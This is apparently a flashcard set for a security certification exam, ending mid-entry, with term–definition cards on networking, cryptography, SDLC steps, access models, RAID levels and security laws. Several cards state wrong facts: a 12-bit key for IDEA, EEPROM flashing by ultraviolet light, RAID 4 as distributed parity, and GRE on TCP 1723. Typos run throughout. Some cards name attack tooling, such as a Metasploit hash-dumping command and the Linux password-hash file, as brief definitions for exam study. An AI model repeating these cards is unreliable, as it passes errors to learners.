Computer-Aided Software Engineering uses programs to assist in the creation and maintenance of other computer programs. Tools Workbenches Environments 4th gen languages often use CASE

Title 18 U.S.C. Section 242

Deprivation of Rights Under Color of Law

Operations Security

Concerns systems and data. About people, data, media, and hardware; all of which are elements that need to be considered from a security perspective

NIST SDLC Step 3

Conduct a Sensitivity Assessment: Look at the security sensitivity of the system and the information to be processed.

OCTAVE Phase 3

Conducts the Risk Analysis. Develops Risk Mitigation Strategy.

True Positive Example

Conficker worm is spreading on a trusted network, and NIDS alerts

False Negative

Conficker worm is spreading on a trusted network, and NIDS is silent

Object(Labels)

Confidential, Secret, Top Secret. EO 12356

CIA

Confidentiality, Integrity, Availability

CCB

Configuration Control Board - Establishment of and charter for a group of qualified people with responsibility for the process of controlling and approving changes throughout the development and operational lifecycle of products and systems

Real Evidence

Consists of tangible or physical objects. USB Storage, DVDs, Hard Drives, Printed Business Records.

Basic Input Output System(BIOS)

Contains code in firmware that executed when a PC is powered on. It first runs Power-On Self-Test(POST)

Motherboard

Contains hardware. Firmware, Memory slots, CPU, etc.

CDN

Content Delivery Networks. Akamai, Amazon CloudFront, CloudFlare. CDNs also increase availability and can reduce the effects of denial of service attacks. 75-140ms range, but it can be significantly higher, especially for mobile users accessing a site over a 3G network

NIST SP 800-34

Contingency Planning Guide for Federal Information Systems

COBIT

Control Objectives for Information and related Technology is a control framework for employing information security governance best practices within an organization. Provides IT Governance Model.

***EXAM WARNING***

Control types on the exam, do not memorize examples: instead look for the context. Firewall is a good example of a preventative control. A lock is a good example of a preventive physical control

COCOM

Coordinating Committee for Multilateral Export Controls. In effect from 1947 to 1994. Charter COCOM members include, Japan, Australia, Turkey, and much of the rest of the non-Soviet controlled countries.

Single Loss Expectancy (SLE)

Cost of One Loss

Common SQL Commands

Create, Select, Delete, Insert, Update

Spiral Model

Created by Barry W. Boehm. The model creates a risk-driven approach to the software process rather than a primarily document-driven or code-driven process

The TCP/IP Model

Created by DARPA in the 1970s. The formal name is the Internet Protocol Suite.

Wassenaar Arrangement

Created in 1996, relaxed many restrictions on exporting cryptography.

CER

Crossover Error Rate describes the point where the False Reject Rate (FRR) and False Accept Rate (FAR) are equal.

CIRP

Cyber Incident Response Plan is designed to respond to disruptive cyber events, including network-based attacks, worms, computer viruses, Trojan horses, etc.

Fire Class D

D:Combustible Metals -Magnesium -Zinc -Calcium -Titanium -Lithium

Discretionary Access Control

DAC gives subjects full control of objects they have created or been given access to, including sharing the objects with other subjects

Data Query Languages

DDL(Data Definition Language) DML(Data Manipulation Language)

Direct Sequence Spread Spectrum

DSSS uses the entire band at once, "spreading" the signal throughout the band

DCE

Data Circuit Terminating Equipment. A device that networks DTEs, like a router. DCE marks the end of ISP's network. DTE is responsibility of customer.

DES

Data Enceyption Standard. Standard symmetric cipher developed in 1976. Created due to lack of cryptographic standard.IBM designed it, based it on Lucifer(old symmetric cipher) ***DESCRIBES DEA***

Types of Integrity

Data Integrity and System Integrity

DTE

Data Terminal Equipment. Any type of network connected user machine(terminal)

Metadata

Data about data

Unconstrained Data Item (UDI)

Data that does not require integrity. Assurance is based upon integrity verification procedures (IVPs) that ensure that data are kept in a valid state.

Remanence

Data that persists beyond noninvasive means to delete it

DBA

Database Administrators

DBMS

Database Management System

Database Shadowing

Database shadowing uses two or more identical databases

Restore/Rollback(Databases)

Databases can rollback/restore to a prior restore point

Address Space Layout Randomization

Decreases likelihood of successful exploitation by making memory addresses employed by the system less predictable. When developing exploits and building post-exploitation capabilities. Leverages existing code executions to prevent exploitation. Not guaranteed.

DARPA

Defense Advanced Research Projects Agency

Outsiders

Defined as unauthorized attackers with no authorized privileged access to a system or organization.

Demarc

Demarcation Point. The point where the DTE and DCE meet. ISP Responsibility Ends and Customers begins. Circuit uses "clock signal." both sides must synchronize to a clock signal provided by DCE.(Channel Service UNIT/CSU)

DMZ

Demilitarized Zone Network. Network servers receiving traffic from untrusted netwrosk should be placed on the DMZ networks. Assumption that any host may be comprised must be a reality. A classic DMZ uses two firewalls vs. Single Firewall DMZ( 3-Legged DMZ)

Denial-of-Service Attacks

Denial-of-Service attacks work by simply polluting the wireless spectrum with noise

SSH

Designed as a secure replacement for Telnet, FTP, and the UNIX "R" commands (rlogin, rshell, etc). Provides confidentiality, integrity, and secure authentication. S("SSH")FTP, SCP(Secure Copy) for transferring files. SSH listens on port 22.

Government clouds

Designed to keep data and resources geographically contained

Wireless Application Protocol

Designed to provide secure Web services to handheld wireless devices such as smart phones. WAP is based on HTML, and includes HDML (Handheld Device Markup Language). A WAP browser is a microbrowser, simpler than a full Web browser, and requiring fewer resources

Reformatting

Destroys original FAT and replaces it with a new one. both cases data remains and can be recovered. Writing 0's or random characters.

IAB Practice 4

Destroys the integrity of computer-based information

Degaussing

Destruction of magnetic media using other magnets. Ensures integrity is affected.

Detection

Detection (also called identification) is the phase in which events are analyzed in order to determine whether these events might comprise a security incident

NIST SDLC Step 5

Determine Security Requirements: Determine technical features (like access controls), assurances (like background checks for system developers), or operational practices (like awareness and training).

Asymmetric Encryption

Diffie Hellman key exchange in 1976. RSA algorithm was invented in 1977(Rivest, Shamir, Adleman). Mathematical Breakthrough. Uses two keys. If you encrypt with one key, you may decrypt with the other. Also called public key encryption. Publicly posted key. Once encrypted the same key cannot be used to decrypt. Only the private key can do so. Used for digital signature. Asymmetric methods use one-way functions.

DSL

Digital Subscriber Line use existing copper pairs to provide digital service to homes and small offices. Speeds 10 mb or more. SDSL(Symmetric), ADSL(Asymmetric), VDSL(Very High Rate), and HDSL(High Data Rate)

DSSS

Direct Sequence Spread Spectrum uses the entire band at once, "spreading" the signal throughout the band.

Real Memory

Directly accessible by the CPU and is used to hold instructions

Opposing Forces to CIA

Disclosure(Confidentiality), Alteration(Integrity), Destruction(Availability)

TCSEC Division C

Discretionary Protection mean Discretionary Access Control systems(DAC) Includes class C1(Discretionary Security Protection) and C2(Controlled Access Protection).

Guidelines

Discretionary, useful pieces of advice, such as "to create a strong password."

NIST SDLC Step 16

Disposal: The secure decommission of a system.

SDLC 10

Disposition

IAB Practice 2

Disrupts the intended use of the Internet

RIP

Distance Vector Routing Protocol. Uses hop count as metric. Does not have full view of the network; lacks convergence

DNP3

Distributed Network Protocol provides an open standard used primarily within the energy. Provides interoperability between various vendors' SCADA and smart grid applications. Scene in US Department of Energy

First Normal Form (1NF)

Divide data into tables.

****EXAM WARNING****

Do not confuse Service Oriented Architecture (SOA) with SOAP. Different concepts.

Need to know

Does the user "need to know" the specific data they may attempt to access? More granular than least privelage.

Ethics

Doing what is morally right. i.e Hippocratic Oath. Treat sensitive information ethically.

DNSSEC

Domain Name Server Security Extensions provides authentication and integrity to DNS responses via the use of public key encryption

Acquisitions

Due diligence requires a thorough risk assessment of any acquired company's information security program.

Object Reuse Attacks

Dumpster Diving, Recovering Info from Unallocated Blocks on a Disk Drive. Cleaning and destruction should follow a formal policy.

ITSEC/TCSEC Ratings

E0: D F-C1, E1: C1 F-C2, E2: C2 F-B1, E4: B1 F-B2, E4: B2 F-B3, E5: B3 F-B3, E6: A1 Additional functionality ratings: F-IN: High integrity requirements AV: High availability requirements DI: High integrity requirements for networks DC: High confidentiality requirements for networks DX: High integrity and confidentiality requirements for networks See: http://www.ssi.gouv.fr/site_documents/ITSEC/ITSEC-uk.pdf

E Carriers

E1s are dedicated 2.048-megabit circuits E3, 16 E1s to form a 34.368 megabit circuit

EAP-TTLS

EAP Tunneled Transport Layer Security;dropping the client-side certificate requirement, allowing other authentication methods (such as password) for client-side authentication

EAP-FAST

EAP-Flexible Authentication via Secure Tunneling; was designed by Cisco to replace LEAP. It uses a Protected Access Credential (PAC), pre-shared key.

Types of EAP

EAP-MD5, LEAP, EAP-FAST, EAP-TLS, EAP-TTLS, and PEAP

EAP-TLS

EAP-Transport Layer Security. ses PKI, requiring both server-side and client-side certificates. Costly

Common Criteria: Levels of Evaluation

Each builds on the level of in-depth review of the preceding level EAL1: Functionally tested EAL2: Structurally tested EAL3: Methodically tested and checked EAL4: Methodically designed, tested, and reviewed EAL5: Semi-formally designed, and tested EAL6: Semi-formally verified, designed, and tested EAL7: Formally verified, designed, and tested.

Bus Topology

Each node inspects the data as it passes along the bus.

EMI

Electromagnetic Interference. Improperly shield cable, and circuits may suffer cross talk from EMI. Mitigated via proper cable management.

5 Modes of DES

Electronic Code Book(ECB) Cipher Block Chaining(CBC) Cipher Feedback (CFB) Output Feedback (OFB) Counter Mode (CTR) ECB is the original mode. CBC, CFB, and OFB were later added. NIST Special Pub 800-38a

EEPROM

Electronically Eraseable Progrmamable Read Only Memory) may be "flashed," or erased and written to multiple times. "flashing" comes from ultraviolet light.

NonInterference Model

Ensures that data at different security domains remain separate from one another.

Antivirus

Employ heuristic or statistical methods for malware detection. Detection predominantly means of detecting malware is still signature based. Not good for Zero Day.

High Availability Clusters

Employs multiple systems that are already installed, configured, and plugged in, such that if a failure causes one of the systems to fail then the other can be seamlessly leveraged to maintain the availability of the service or application being provided.

ESP

Encapsulating Security Payload provides confidentiality by encrypting packet data.

Single DES

Encrypting 64 bits blocks of 56 bit key. Weak to brute force.

Symmetric Encryption

Encryption that uses one key to encrypt an decrypt

EULA

End-User License Agreements can be in paper or electronic form

Endpoint Security

Endpoints are the targets of attacks, preventive and detective capabilities on the endpoints themselves provide a layer beyond network-centric security devices.

EPROM

Erasable Programable Read Only Memory may be "flashed," or erased and written to multiple times.

CWE:Directory Path Traversal

Escaping from the root of a web server(such as/var/www) into the regular file system by referencing directories such as ".../..."

Evidence Integrity

Evidence must be reliable during the course of it's acquisition and analysis. Checksums ensure no data changes ocurred. One-way hashes(MD5, SHA-1) are commonly used.

Agile Software Development

Evolved as a reaction to rigid software development models The Agile Manifesto: • Individuals and interactions over processes and tools • Working software over comprehensive documentation • Customer collaboration over contract negotiation • Responding to change over following a plan"

Hierarchical Databases

Ex: the global Domain Name Service(DNS) servers form a global tree. The root name servers are the "root zone" at the base of the tree; individual DNS entries for the leaves.

***EXAM Warning***

Exam strongly prefers open over proprietary standards/protocols. CISCO's EIGRP is not open.

SSL, IPsec VPN

Examples of protocols used forencrypting data in motion.

XP

Extreme Programming ensures communication, simplicity, feedback, respect, and courage through: -Planning: specifies the desired features -Paired programming: programmers work in teams. -Forty-hour workweek: -Total customer involvement -Detailed test procedures(Unit Test)

False Accept Rate

FAR occurs when an unauthorized subject is accepted by the biometric system as valid. Also called a Type II error.

Broadcast MAC

FF:FF:FF:FF:FF:FF

Broadcast Address

FF:FF:FF:FF:FF:FF. Communications sent by commputers via this address will reach other computers but not server's VLANS. InterVLAN communication requires Layer 3 routing.

Frequency Hopping Spread Spectrum

FHSS. For sending traffic via a radio band. Minimize interference.

False Reject Rate

FRR occurs when an authorized subject is rejected by the biometric system as unauthorized. Also called a Type I error

Claude Shannon

Father of information security

FIdM

Federated Identity Management applies Single Sign On (SSO) on a much wider scale. Cross Organization to Internet. May use OpenID or SAML (Security Association Markup Language)

Examples of Physical Access Control

Fences, Gates, Lights, Cameras, Locks, Mantraps, and Guards.

FTP

File Transfer Protocol. Has no confidentiality or integrity. Ports 20(Originates), 21(Data transfer). Many firewalls will block Active FTP data.

Firewalls

Filter traffic between networks. TPC/IP packet filter and stateful firewalls make decisions based on Layer 3, and 4. Multihomed. Multiple NICS connected to multiple different networks.

15:FIN

Finish a connection (gracefully)

Kaiser Permanente 2009

Fired/Disciplined over 20 workers for violating policy (and possibly violating regulations such as HIPAA) for viewing Nadya Sulemans's (Octomom) medical records without a need to know.

Heat Detectors

For when temperature exceeds an established safe baseline

Forensic Media Analysis

Forensic data typically comes from binary images of secondary storage and portable storage devices such as hard disk drives, USB flash drives, CDs, DVDs, and possibly associated cellular phones and mp3 players

FHSS

Frequency Hopping Spread Spectrum for sending traffic via a radio band. Designed to maximize throughput. Uses a number of small frequency channels throughout the band

GPL

GNU Public License • The freedom to use the software for any purpose, • The freedom to change the software to suit your needs, • The freedom to share the software with your friends and neighbors, • The freedom to share the changes you make.

802.1X Authentication

Generally bundled with additional security functionality such as: patch verification, antivirus signatures and definitions.

GRE

Generic Routing Encapsulation to pass PPP via IP, and uses TCP for a control channel (using TCP port 1723)

Enigma

German Cipher Machine

Binary Backup Tools

Ghost (when run with specific non-default switches enabled) AccessData's FTK Guidance Software's EnCase.

GAN

Global Area Network, a global collection of WANs

GIG

Global Information Grid is the U.S. Department of Defense (DoD) global network, one of the largest private networks in the world

Chosen/Adaptive Plaintext Attack

Goal of deriving key. Usually launched against asymmetric crypto systems. Mirrors chosen plaintext attack in round 1

Environmental Controls

HVAC and Power are crucial factors that can impact server room security if not carefully maintained.

White hat hackers

Hackers who act legally and within the bounds of the law. Also known as ethical hackers

Blackhats

Hackers with who act maliciously

RAID 2

Hamming Code. Not considered commercially viable for hard disks and is not used. Require either 14 or 39 hard disks and a specially designed hardware controller. Cost prohibitive

Shredding

Hard- Copy Sensitive Information needs to be shredded prior to disposal. Cross Cut Shredding is preferred.

Dual Homed Host

Has two network interfaces. One connected to a trusted network and the other connected to a untrusted network

HAVAL

Hash of Variable Length is a hashing algorithm that creates message digests of 128,160,192,224.

HMAC

Hashed Message Authentication Code. Combines a shared key with Hash. IPsec uses HMAC

Combination locks

Have dials that must be turned to specific numbers. shared Combos is a security concern

x86 CPU

Have four rings. But most use rings 0 and 3 only.

Centralized Logging

Having logs in a central repository allows for more scalable security monitoring and intrusion detection capabilities

Task

Heavy Weight Process(HWP)

Security assessments

Holistic approach to assessing the effectiveness of access control. The goal is to broadly cover many other specific tests, to ensure that all aspects of access control are considered.

HIDS

Host-based Intrusion Detection Systems process information within the host. Tripwire protects system integrity by detecting changes to critical operating system files.

HIPS

Host-based Intrusion Prevention Systems process/block/permit information within the host.

HTTPS

Hypertext Transfer Protocol Secure transfers encrypted Web-based data via SSL/TLS(443)

HTTP

Hypertext Transfer Protocol used to transfer unencrypted Web-based data(80)

Two Basic Routing Protocols.

IGP: Interior Gateway Protocols EGP: Exterior Gateway Protocols.

IKE

IPsec can use a variety of protocols(MD5, TDES, AES, Etc) for confidentiality Internet Key Exchange negotiates the algorithm selection process. Two sides of IPsec tunnel usually use IKE to negotiate.

Tunnel Mode

IPsec can use either. Tunnel mode is used by security gateways p2p tunnels. ESP tunnel encrypts entire packets

IPsec vs. SSL

IPsec makes fundamental changes to IP networking and the OS while SSL does not

IPsec

IPv4 has no built-in confidentiality. higher-layer protocols such as TLS are used to provide security

***Exam Warning***

ISC2 Code of Ethics is highly testable. You may be asked for the "best" ethical answer, when all answers are ethical, per the canons.

OCTAVE Phase 1

Identifies staff knowledge

OCTAVE Phase 2

Identifies vulnerabilities

Tailoring Process: 1

Identify and designate common controls in initial security control baselines

AAA

Identity and Authentication, Authorization, and Accountability

Identity

Identity is a claim that you are a specific person. "I am Person X." Identities must be unique

(IDaaS)

Identity is a required pre-condition to effectively manage confidentiality, integrity, and availability. Leverage cloud service for identity management.

SDLC 8

Implementation

NIST SDLC Step 8

Implementation: The system is tested and installed.

Countermeasures

Implemented to mitigate attacks. Multiple overlapping control spanning across multiple domains. Enhance and support each other.

TRIM command

Improves garbage collection. Trim is an attribute of the ATA Data Set Management Command. TRIM improves compatiability, endurance, and performance of drives.

Stateful Firewalls

Include state table that allows the firewall to compare current packets to previous ones. Slower than packet filters but far more secure. Will deny fraudulent packets based on previous state table entries.

ISC2 Code of Ethics

Includes the Preamble, Canons, and Guidance. Preamble(Intro), Canons(Mandatory), Guidelines(Advisory)

NIST SDLC Step 6

Incorporate Security Requirements Into Specifications: Ensure that the previously gathered information is incorporated in the project plan.

ITIL

Information Technology Infrastructure Library is a framework for providing best services in IT Service Management(ITSM). 5 Core Guidance Pubs 1. Service Strategy 2. Service Design 3. Service Transition 4. Service Operation 5. Continual Service Improvement

ITSEC

Information Technology Security Evaluation Criteria (ITSEC). First International Evaluation Model. Separates Functionality from Assurance. 2 types of Assurance: effectiveness(Q) and correctness(E)

NIST SDLC Step 17

Information: Information may be moved to another system, archived, discarded, or destroyed.

Iaas

Infrastructure as a Service

CMM

Initial Repeatable Defined Managed Optimizing

SDLC 1

Initiation

NIST SDLC Step 2

Initiation: The need for a system is expressed and the purpose of the system is documented

NIST SDLC Step 9

Install/Turn-On Controls: A system often comes with security features disabled. These need to be enabled and configured.

IDE

Integrated Drive Electronics Disk Drive

ISDN

Integrated Services Digital Network. Digital Subscriber Line n earlier attempt to provide digital service via "copper pair". ISDN Basic Rate Interface (BRI) service provides two 64K. PRI (Primary Rate Interface) provides twenty-three 64K channels. Both have a 16K signaling channel. Sucked

SDLC 7

Integration and Test

Mesh topology

Interconnects network nodes to each other. Have superior availability

IGP

Interior Gateway Protocols RIP OSPF (Layer 3)

Private Sector Labels

Internal Use Only and Company Proprietary

IDEA

International Data Encryption Algorithm. Symmetric block cipher designed as internation replacement to DES. Uses 12-bit key and 64-bit block size. Patent encumberance and slow speed are problems.

ICMP

Internet Control Message Protocol, a helper protocol that helps Layer 3

IPsec

Internet Protocol Security. A sutie of protocols that provide a cryptographic layer to both IPv4 and IPv6. Provides VPNs(Virtual Private Networks) Includes two primary protocols Authentication Header (AH), Encapsulating Security Payload(ESP). Provide similar functions. Sometimes IPsec has ISAKMP and IKE. IPsec is overly complex. Complexity is the Enemy of security

Contract Acceptance testing

It is performed against the contract's acceptance criteria for producing custom developed software.

Purple

Japanese encryption device

Privilege Monitoring

Job functions that warrant greater scrutiny include: account creation/modification/deletion, system reboots, data backup, data restoration, source code access, audit log access, security configuration capabilities, etc.

Fire Class K

K: Cooking Media -Veggie Oil -Animal Oils -Fats/Lards

Thread

Light Weight Process(LWP)

LDAP

Lightweight Directory Access Protocol provides a common open protocol for interfacing and querying directory service information provided by network operating systems. Port 389 via TCP

Switcha

Like a bridge but with more than two ports. Best practice to only connect one device per switch. Provide traffic isolation by associating the MAC address of each computer and server with its port. Shrinks collision domains

Narrow Scope

Limited Knowledge of asset that is being tested.

Linear Cryptanalysis

Linear cryptanalysis is a known plaintext attack where the cryptanalyst finds large amounts of plaintext/ciphertext pairs created with the same key

/etc/shadow

Linux stores hashes for passwords here

LAN

Local Area Network is a comparatively small network, typically confined to a building or an area

Crime(Site Selection)

Local crime rates are factored into site selection

Boot Sector

Located after POST is complete

Lockpicking

Lock picking is the art of opening a lock. All key locks can be picked or bumped

Phisher

Malicious attackers who sends emails out to many people infecting computers with malware to steal information.

System Owner

Manager responsible for the actual computers that house data. Ensure the hardware is physically secure, OS's are patched up-to-date.

TCSEC Division B

Mandatory Protection. Means Mandatory Access Control systems(MAC). Includes classes B1(Labeled Security Protection), B2 (Structured Protection) and B3(Security Domains). *Higher numbers are more secure.

CWE: SQL Injection

Manipulation of a back-end SQL server voa a front-end web server.

Remote meeting technology

Many of these solutions are designed to tunnel through outbound SSL or TLS traffic, which can often pass via firewalls and any Web proxies

***EXAM WARNING***

Many organizations will opt for not implementing rotation of duties because of the cost associated with implementation. For the exam, be certain to appreciate that cost is always a consideration, and can trump the implementation of some controls.

Non-Disclosure Agreement(NDA)

Methods require that employees or other persons privy to business confidential information do not disclose to, or work for competitors in an unauthorized manner

MTD = RTO + WRT

Maximum Tolerable Downtime = Recovery Time Object + Work Recovery Time

MTD

Maximum Tolerable Downtime which describes the total time a system can be inoperable before an organization is severely impacted. Also MAD, MTO, and MAO

Disk Encryption/Decryption

May occur in software or hardware. Software-based solutions may tax the computer's performance, while hardware-based solutions offload the cryptographic work onto another

MTTR

Mean Time to Repair describes how long it will take to recover a specific failed system.

Convergence

Means providing services such as industrial controls, storage and voice. Via Ethernet and TCP/IP.

MAN

Metropolitan Area Network is typically confined to a city, a zip code, a campus, or office park

NIST SDLC Step 18

Media Sanitization: There are three general methods of purging media: overwriting, degaussing (for magnetic media only), and destruction.[22]

Offline Media Storage

Media Storage Facilities are necessary for disaster recovery, potential legal proceedings, or other matters. Facility should be far enough removed from primary to avoid impact.

Reference Monitor

Mediates all access between subjects and objects

Reference Monitor

Mediates all access between subjects and objects. It enforces the system's security policy. Prevents normal user from wrting to a restricted file, like the system password file. Eg: Mandatory Access Control (MAC), reference prevents secret > top secret.

***EXAM WARNING***

Memorizing the specific steps of each SDLC is not required, but be sure to understand the logical (secure) flow of the SDLC process.

Memory Addressing

Memory values may be stored in CPU Registers, and General RAM. (Memory Location #YYYY, #ZZZZ)

Hashdump

Metasploit command that dumps password hashes from memory.

***EXAM WARNING***

Microsoft trust relationships fall into two categories: non-transitive and transitive. Non-transitive trusts only exist between two trust partners. Transitive trusts exist between two partners and all of their partner domains.

TCSEC Division D

Minimal Protection. This divison describes TCSEC-evaluated systems that od not meet the requirements of higher divisions

MOR

Minimum Operating Requirements describe the minimum environmental and connectivity requirements in order to operate computer equipment.

RAID 1

Mirrored Set perhaps the simplest of all RAID levels to understand. RAID 1 creates/writes an exact duplicate of all data to an additional disk.

Cisco

Multifunction device/chassis that can act as a router, switch, firewall, NIDS, etc. ***Exam will reference dedicated vs. multifunction***

Compartmented

Mode of operation where all subjects accessing the system have the necessary clearance but do not have the appropriate formal access approval nor need to know for all information in system. Objects are placed into compartments.

Microkernels

Modular kernels. A microkernel is usually smaller and has less native functionality than a typical monolithic kernel. Added functionality via Loadable Kernel Modules(LKM). Running modules in user mode(ring 3)

Fingerprints

Most widely used biometric control available today. Smartcards can carry fingerprint information. Fingerprint minutiae, specific details of fingerprint friction ridges

MD5

Most widely used, created by Ronal Rivest. Creates 128 bit hash value based on any input length. MD6 is newest version, published in 2008

Second Normal Form (2NF)

Move data that is partially dependent on the primary key to another table

RAT

Remote Access Trojan

MPLS

Multiprotocol Label Switching. rovides a way to forward WAN data via labels

S/MIME

Multipurpose Internet Mail Extensions. Provided standard format for email including characters, sets, and attachments. S/MIME leverages PKI to encrypt and authenticate MIME-encoded email. Eg: S/MIME gateway.

Users

Must follow the rules. Must comply with mandatory policies, procedures, standards, etc.

Service Set Identifier

Must know the SSID before joing a LAN

Walls and Doors

NFPA fire resistant rating shall no be less than one hour.

Normal Response Mode

NRM can transmit when given permission by the primary

Count-Down Timers

Needs to be both visible and audible

First Octet

Network

Components of Penetration Test

Network (Internet) Network (internal or DMZ) War dialing Wireless Physical (attempt to gain entrance into a facility or room)

NAC

Network Access Control: network device based solution supported by vendors including, CISCO

NAP

Network Access Protection: computer operating system based solution by Microsoft.

NAT

Network Address Translation is used to translate IP addresse. Translate RFC1918 addresses as they traverse from intranet to the Internet. NAT hides the origin of a packet. Source address is the gateway

Promiscuous Network Access

Network Intrusion Detection Systems run in promiscuous mode. Normally requires super user access.

Types of Logs: Network Security Software/Hardware:

Network Security Software/Hardware: • Antivirus logs • IDS/IPS logs • Remote Access Software (such as VPN logs) • Web proxy • Vulnerability management • Authentication servers • Routers and firewalls

Types Of IDS/IPS

Network-based and host-based.

Microsoft NTFS Permissions

New Technology File System Read Write Read and Execute Modify Full Control (all encompassing)

Process States

New: process being created Ready: process waiting to e executed by the CPU Running: process being executed by the CPU Blocked: waiting for I/O Terminate: a completed process Zombie: Child process whose parent process is terminated.

FE-13

Newest substitute. Can be breathed

Social Engineering

No tech hacking. Uses Human Mind. An example of a social engineering attack combined with a client-side attack is emailing malware with a Subject line of "Category 5 Hurricane is about to hit Florida!"

Electronic Discovery

Pertains to legal counsel gaining access to pertinent electronic information during the pre-trial discovery phase of civil legal proceedings

Diskless Workstation

Normal POST, Loads TCP/IP Stack, and downloads kernel and OS using protocol like BOOTP or DHCP

Password policy compliance

Notifying users to change their passwords before they expire

Annual Rate of Occurrence(ARO)

Number of Losses per Year

OLE

Object Linking and Embedding is a way to link documents to other documents.

Java

Object Oriented Programming Language. Bytecode is platform independent and is run/interpreted on the Java Virtual Machine (JVM).

Quantitative Analysis

Objective analysis of hard numbers and assets. AV, EF, SLE are all examples of quantitative quantities.

Bell-LaPadula Model

Observes two rules. Simple Security Property and Security Property. Focused on maintaining the confidentiality of objects.

NISTSDLC Step 7

Obtain the System and Related Security Activities: May include developing the system's security features, monitoring the development process itself for security problems, responding to changes, and monitoring threats.

OEP

Occupant Emergency Plan provides coordinated procedures for minimizing loss of life and injury

CWE: Buffer Overflow

Occurs when a programmer does not perform bounds checking

Tailgating

Occurs when an unauthorized person follows an authorized person into a building after unlock/authenticating. Often combined with social engineering.

X.25

Older. X.25 provided a cost-effective way to transmit data over long distances in the 1970s through early 1990s

One Time Pad

One Time Key. Discarded after one use. Provably unbreakable form of crypto.

Limitation of Overwriting

One cannot tell if a drive has been securely overwritten by simply looking at it. Errors made during overwriting can lead to data exposure.

California Senate Bill 1386 (SB1386)

One of the first US state level breach notification laws. Requires organizations suffering a personal data breach to notify customers of the potential disclosure.

Simplex

One way communication

OCSP

Online Certificate Status Protocol. Replacement for CRLs, and uses client server. Scales better than CRLs

Incremental

Only archive files that have changed since the last backup of any kind was performed. EX: On Monday's backup, only those files that have been changed since Sunday's backup will be marked for backup

OSPF

Open Shortest Path First is a link state routing protocol that learns the entire network topology for their "area". Send event driven updates.

Master Key

Opens any lock for a given security zone in a building

Circuit Level Proxies

Operate at Layer 5(Session Layer). SOCKS is the most popular Circuit Level Proxy. TCP Port 1080. App;ications need to be configured to support SOCKS.

NIST SDLC Step 12

Operation/Maintenance: The system is modified by the addition of hardware and software and by other events.

NIST SDLC Step 14

Operational Assurance: Examines whether a system is operated according to its current security requirements.

OPEX

Operational Expense. Routers and Switches OPEX is low. NIDS, NIPS, and AV are high.

OCTAVE

Operationall Critical Threat, Asset, and Vulnerability Evaluation, a risk management framework from Carnegie Mellon University. Describes a three-phase process for managing risk.

ROM Chips

PROM, EPROM, and EEPROM.

Pen Test Methodology

PRSVER Planning Reconnaissance Scanning Vulnerability Assessment Exploitation Reporting

10:URG

Packet contains urgent data

IP Fragmentation

Packet exceeds the Maximum Transmission Unit (MTU), Router may fragment it. Fragmentation breaks a large packet into multiple smaller packets

PAP

Password Authentication Protocol. A very weak authentication protcol. Sends UN and PW in clear text.

PAP

Password Authentication Protocol. Defined by RFC 1334. A user enters a password and it is sent across the network in clear text

Cain & Abel

Password cracker application

Exposure Factor(EF)

Percentage of Asset Value Lost

PAN

Personal Area Networks range of 100 meters or much less. Low-power wireless technologies such as Bluetooth use PANs

Site Selection***EXAM WARNING***

Physical Safety of Personnel is a top priority

Deterrent Control Examples

Physical: "Beware of Dog" sign, Light Technical: Warning Banner at Login Administrative: Sanction Policy

Detective Control Examples

Physical: CCTV, Light Technical: IDS Administrative: Post-employment random drug tests

Preventive Control Examples

Physical: Lock, Mantrap Technical: Firewall Administrative: Pre-employment drug screening.

Bastian Host

Placed on the Internet that is not protected by another device(firewall.) Hardened to protect self.

Syslog(Unencrypted)

Plaintext over UDP 514. The most widely used logging subsystem. Unreliable and connectionless UDP as a transport protocol for logs has implications for ensuring continuity of logging.

SDLC 3

Planning

Inline NIPS

Plays the role of a layer 3-7 firewall by passing or allowing traffic. NIPS provides defense in depths

PPTP

Point-to-Point Tunneling Protocol tunnels PPP via IP

Security Control

Policies, procedures, and other administrative controls Assessing the real world-effectiveness of administrative controls Change management Architectural review Penetration tests Vulnerability assessments Security Audits.

Port Controls

Ports that may allow copying data to or from a system. Large amounts of information can be placed on a device small enough to evade perimeter contraband checks. Lock ports. EG: Directory Group Policy, Enterprise level port controls.

Collisions

Possible plaintexts is larger than the number of possible hashes. When things have the same fixed length hash.

Lessons Learned

Post-incident activity. Provide a final report on the incident, which will be delivered to management

POST

Power-On Self-Test. Performs basic tests, including verifying the integrity of the BIOS, Testing the memory, Identifying devices, other tasks.

Background checks

Pre-Employment Screening

NIST SDLC Step 1

Prepare a Security Plan; Ensure that security is considered during all phases of the IT system life cycle

PGP

Pretty Good Privacy. Whole Disk Encryption for data at rest

Processes

Processes communicate between the rings via system calls.

3 Types of Policy

Program Policy, Issue-Specific- and System-Specific Policy.

Components of Program Policy

Purpose, Scope, Responsibilities, Compliance.

12:PSH

Push data to application layer

Compensating

Put in place to compensate for weaknesses in other controls. i.e surfing explicit web sites would be a cause for an employee to lose his/her job.

Raid Levels

RAID 0: Striped Set RAID 1: Mirrored Set RAID 3: Byte Level Striping with Dedicated Parity RAID 4: Block Level Striping with Distributed Parity. RAID 5: Block Level Striping with Distributed Parity RAID 6: Block Level Striping with Double Distributed Parity

IAB's Ethics and the Internet

RFC 1087; published 1987. Practices considered unethical behavior if someone purposefully committed.

IGPs

RIP OSPF

Real-time Transport Protocol

RTP. Common VoIP protocol. VoIP is based on data.

RFID

Radio Frequency Identification used to create wirelessly readable tags for animals or objects. Eg: Faraday Wallet/ Cage

RAD

Rapid Application Development rapidly develops software via the use of prototypes, "dummy" GUIs, back-end databases, and more.

Third normal Form

Remove data that is not dependent on the primary key. [35]

Stateless Autoconfiguration

Removes the requirement for DHCP

Linux/UNIX permissions

Read("r") Write("w") Execute("x") May be set separately to the owner, group, or world.

Fourth Amendment

Reasonable Search and Seizure

Repeater

Receives bits on one port and repeats them out the other port. (No Security)

Repeater

Receives bits on one port, repeats on another

Whole Disk Encryption

Recommended for ensuring confidentiality. Partial encryption, such as encrypted files folders or partitions, often risk exposing sensitive data stored in temporary files.

Watchdog Timer

Recover a system by rebooting after critical processes hang or crash

RPO

Recovery Point Objective is the amount of data loss or system inaccessibility (measured in time) that an organization can withstand

RTO

Recovery Time Objective describes the maximum time allowed to recover business or IT systems

Caller ID

Requires calling from the correct phone number. Caller ID can be easily forged

Inference

Requires deduction: there is a mystery to be solved and lower level details provide the clues.

Sarbanes-Oxley Act of 2002 (SOX)

Requires disclosure, auditor independence, and internal security controls. i.e risk assessment. Intentional violation of SOX can result in criminal charges.

Gramm-Leach-Bliley Act (GLBA)

Requires fianncial institutions to protect the confidentiality and integrity of consumer financial information. Forced them to notify consumers of their privacy practices.

Database Security

Requires security precautions, inference controls and polyinstantiation

13:RST

